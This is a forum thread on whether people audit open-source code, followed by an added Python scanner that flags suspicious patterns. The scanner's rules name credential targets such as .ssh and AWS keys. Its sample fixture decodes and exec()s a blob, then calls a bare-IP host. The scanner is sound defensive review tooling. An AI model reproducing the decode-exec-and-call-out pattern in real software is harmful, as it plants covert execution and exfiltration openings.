this post was submitted on 29 May 2025

Cybersecurity

cross-posted from: https://lemmy.ml/post/30846707

cross-posted from: https://lemmy.ml/post/30846701

The question is simple. I wanted to get a general consensus on whether people actually audit the code that they use from FOSS or open source software or apps.

Do you blindly trust the FOSS community? I am trying to get a rough idea here. Sometimes audit the code? Only on mission critical apps? Not at all?

Let's hear it!

[–] Lazycog@sopuli.xyz 5 points 1 week ago

If it's something that is not very popular/known I do actually look at the code, but never all of it.

I check:

  • most recent commits
  • for something that might have been hidden before one of the releases
  • deeper into utility files
  • look for suspicious patterns in code that might be trying to hide something, mostly in code related to external network calls

This is of course very superficial and in general I try to avoid obscure projects that are not popular and well known.
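The checklist in the comment above (recent commits, what changed right before a release, utility files, anything odd around network calls) can be partly scripted. The following is an added example, not code from the post or from any project it mentions: a small heuristic triage scanner that walks a source tree, flags lines matching a handful of patterns a reviewer would want to read by hand, and ranks files by hit count so the suspicious utility module comes up first. The rule names, the `scan_text`, `scan_tree`, `rank_files` and `triage_samples` helpers, and the two sample source files are all constructed for this example; the commit-history steps (for instance `git log --oneline` and `git diff <prev-tag>..<release-tag>`) are left to git itself.

```python
"""Heuristic source triage for an unfamiliar open-source project.

Added example, not code from the post or any project it names. Every
rule below is a heuristic that says "read this by hand", not a verdict.
"""
import re
from pathlib import Path
from tempfile import TemporaryDirectory

# (rule name, regex, why a reviewer should look). All constructed here.
RULES = [
    ("dynamic-exec", re.compile(r"\b(eval|exec|compile)\s*\("),
     "code built at runtime; check where its input comes from"),
    ("decoded-payload",
     re.compile(r"\b(b64decode|a85decode|unhexlify|zlib\.decompress)\s*\("),
     "an encoded blob is decoded; inspect what it turns into"),
    ("escaped-blob", re.compile(r"(\\x[0-9a-fA-F]{2}){8,}"),
     "long escaped byte string; obfuscation or embedded payload"),
    ("network-call",
     re.compile(r"\b(urllib\.request\.urlopen|urlopen|requests\.(get|post|put|request)"
                r"|socket\.(socket|create_connection)|http\.client\.HTTPS?Connection)\s*\("),
     "outbound network activity; confirm destination and data sent"),
    ("raw-ip-url", re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}"),
     "URL to a bare IP address rather than the project's domain"),
    ("secret-harvest",
     re.compile(r"(\.ssh/|id_rsa|\.aws/credentials|\.npmrc|AWS_SECRET_ACCESS_KEY)"),
     "touches credential files or secrets; rarely legitimate in a library"),
]
REASONS = {name: reason for name, _, reason in RULES}


def scan_text(text, filename="<memory>"):
    """Return findings as (filename, line_no, rule, stripped line) tuples."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule, pattern, _ in RULES:
            if pattern.search(line):
                findings.append((filename, line_no, rule, line.strip()))
    return findings


def scan_tree(root, suffixes=(".py",)):
    """Scan every file under root whose suffix is in `suffixes`."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix in suffixes:
            rel = path.relative_to(root).as_posix()
            findings.extend(scan_text(path.read_text(encoding="utf-8"), rel))
    return findings


def rank_files(findings):
    """Files ordered by number of hits, most suspicious first."""
    counts = {}
    for filename, _, _, _ in findings:
        counts[filename] = counts.get(filename, 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


# Constructed sample tree: one ordinary module and one "utility" module
# that decodes a blob, exec()s it and phones home to a bare IP.
SAMPLE_FILES = {
    "app/main.py": (
        "import requests\n"
        "\n"
        "def fetch_release_notes(version):\n"
        "    # talks to the project's own domain: expected behaviour\n"
        "    return requests.get(f'https://example.org/notes/{version}').text\n"
    ),
    "utils/helpers.py": (
        "import base64, urllib.request\n"
        "\n"
        "def _t():\n"
        "    payload = base64.b64decode('aW1wb3J0IG9z')\n"
        "    exec(payload)\n"
        "    urllib.request.urlopen('http://203.0.113.7/c').read()\n"
    ),
}


def triage_samples():
    """Write the constructed tree to a temp dir, scan it, return findings."""
    with TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_FILES.items():
            target = Path(tmp) / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_tree(tmp)


if __name__ == "__main__":
    found = triage_samples()
    for filename, hits in rank_files(found):
        print(f"{hits:3d}  {filename}")
    for filename, line_no, rule, line in found:
        print(f"{filename}:{line_no} [{rule}] {line}\n    {REASONS[rule]}")
```

The scanner only narrows the reading list; the next step is still to open each flagged line in context and, for the network-call hits, to check what is sent and where. Combined with a diff between the last two release tags, this covers the "hidden before a release" item without reading the whole tree.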